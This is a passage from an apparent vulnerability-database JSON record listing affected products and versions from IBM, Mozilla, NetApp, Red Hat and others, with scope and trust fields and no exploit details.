"san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1.8" }, { "model": "rlks administration and reporting tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.7" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.2" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.41" }, { "model": "tivoli network manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "client application access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.1" }, { "model": "e-series/ef-series santricity management plug-ins", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "flex system fabric cn4093 10gb converged scalable switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.8.12.0" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "websphere partner gateway advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.15" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.9" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.8" }, { "model": "elastic storage server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5.2" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.11" }, { "model": "cloud manager with openstack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.4.2" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.3" }, { "model": "sterling secure proxy ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.88" }, { "model": "tivoli storage manager client management services", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.200" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.11" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "system networking rackswitch g8052", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.11.6.0" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.5" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "20.0" }, { "model": "enterprise linux server eus 6.7.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.8" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.0.15" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.0.13" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.3" }, { "model": "spss modeler", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "15.0.0.1" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "6.0.2" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.3" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4.1.8" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "business process manager express", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "7.0.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.4" }, { "model": "tivoli network manager if0002 ip editio", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.6" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.7" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "spss modeler fp3 if023", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "14.2" }, { "model": "system networking rackswitch g8124-e", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.15.0" }, { "model": "qradar incident forensics", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "enterprise linux desktop supplementary", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.15" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.9" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.1" }, { "model": "rational publishing engine", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "sterling secure proxy ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.2.04" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.18" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.01" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.10" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.3" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "25.0" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.7" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.1" }, { "model": "predictive insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "elastic storage server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.18" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "web experience factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "system networking switch center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.13" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.9.1" }, { "model": "security appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v35007.6.0.3" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.8" }, { "model": "rational policy tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.54" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.12" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.15" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.8" }, { "model": "websphere datapower xc10 appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "watson explorer foundational components", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0.0.2" }, { "model": "integrated management module ii for flex systems 1aoo", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1.0.6" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "24.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.1" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.18" }, { "model": "bluemix liberty for java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.6" }, { "model": "rational method composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "filenet content manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.07" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.4" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "spss modeler", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "17.0" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1.0" }, { "model": "system networking rackswitch g8124", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11.5.0" }, { "model": "mq light", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.7" }, { "model": "infosphere data architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.6" }, { "model": "virtual fabric 10gb switch module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.8.24.0" }, { "model": "control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.0" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.4" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.14" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v35007.5.0.6" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.2" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "control center 6.0.0.1ifix01", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.9.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.12" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.19" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.15" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1.1" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.303" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.12" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "17.0.9" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v50007.3.0.12" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "flashsystem 9843-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.0" }, { "model": "tivoli asset discovery for distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "cplex optimization studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "12.6.0.1" }, { "model": "rbac user creator for data ontap", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.25" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.19" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "38.4" }, { "model": "bluemix liberty for java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "flashsystem 9848-ac1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.25" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.6.13" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "0.6" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.16" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.2" }, { "model": "filenet eprocess", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.16" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "directory server enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7.0" }, { "model": "sterling control center ifix03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.41" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.5" }, { "model": "operations analytics predictive insights", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-1.3.2" }, { "model": "marketing operations", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "rational software architect realtime edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "flashsystem 9846-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.7.5" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "websphere appliance management center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "sterling secure proxy ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.87" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "24.1" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.3" }, { "model": "security siteprotector system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.1" }, { "model": "tivoli storage manageroperations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.100" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.3" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.5" }, { "model": "os image for aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.1" }, { "model": "cplex optimization studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "12.4.0.1" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.10" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.14" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "4.0" }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.4" }, { "model": "rational developer for c/c++", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.1.7" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.3" }, { "model": "infosphere optim query workload tuner for db2 for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "spss modeler fp3 if016", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "15" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "24.4" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.14.3" }, { "model": "rational developer for aix and cobol", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "multi-enterprise integration gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.1" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.12.11" }, { "model": "watson content analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1.8" }, { "model": "fabric manager", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.1.04.0048" }, { "model": "elastic storage server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.7" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "marketing operations", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.32" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.0.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "6.0" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v37007.3.0.10" }, { "model": "infosphere streams", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.0" }, { "model": "websphere real time sr7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.5" }, { "model": "cplex optimization studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "12.5" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.1.3" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.210" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "rational performance tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.22" }, { "model": "ara", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.9.1" }, { "model": "enterprise content management system monitor", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.3.1.23" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.12.3.1" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "rational service tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "31.1.0" }, { "model": "security guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "rational test workbench", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.51" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "network security services", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.7.7" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.37" }, { "model": "gpfs storage server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.3" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "2.0.10" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "watson content analytics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.5" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "cognos command center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.3" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.2" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "24.8.1" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.0.4" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.303" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "1.5.0.2" }, { "model": "rational method composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.2.2" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.5" }, { "model": "rational policy tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "18.0.1" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "tivoli storage manager operations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.2.200" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "sterling secure proxy ifix03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.3" }, { "model": "firefox esr", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "10.0.11" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.1" }, { "model": "contact optimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1.0.7" }, { "model": "rlks administration agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.4.5" }, { "model": "algo one core", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.02" }, { "model": "security appscan enterprise", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.3" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "firefox", "scope": "eq", "trust": 0.3, "vendor": "mozilla", "version": "3.5.5" }, { "model": "business process manager standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6.0.6" }, { "model": "sterling external 